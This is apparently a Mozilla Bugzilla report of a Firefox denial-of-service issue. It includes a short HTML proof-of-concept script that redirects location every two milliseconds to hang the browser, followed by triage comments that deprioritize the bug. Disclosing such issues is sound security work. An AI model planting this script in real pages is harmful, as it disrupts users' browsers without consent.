Open Bug 1336913 Opened 4 years ago Updated 2 years ago

Denial of Service attack via location

Categories

(Core :: DOM: Core & HTML, defect, P5)

51 Branch
defect

Tracking

()

UNCONFIRMED

People

(Reporter: mishra.dhiraj95, Unassigned)

Details

Attachments

(1 file)

Attached file start.html
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Build ID: 20170125094131

Steps to reproduce:

Steps to reproduce:
1. Open start.html 
2. Trying using mozilla. 


Actual results:

<html>
<title></title>
<script>
function d()
{
location = "https://datarift.blogspot.in"
}
setInterval("d()", 2);
</script>
</html>
I am not able to reproduce this in Nightly FF its work perfect for me in Stable and Beta in Windows 7 
and Linux OS.
DOS bugs aren't kept private, opening.
Group: firefox-core-security
When reporting bugs like that, could you test in Nightly to know if the issue has been already fixed (sometimes it's the case) and test with mozregression (with flag --find-fix) to find a working range.
Component: Untriaged → DOM
Product: Firefox → Core
Priority: -- → P5
Component: DOM → DOM: Core & HTML
You need to log in before you can comment on or make changes to this bug.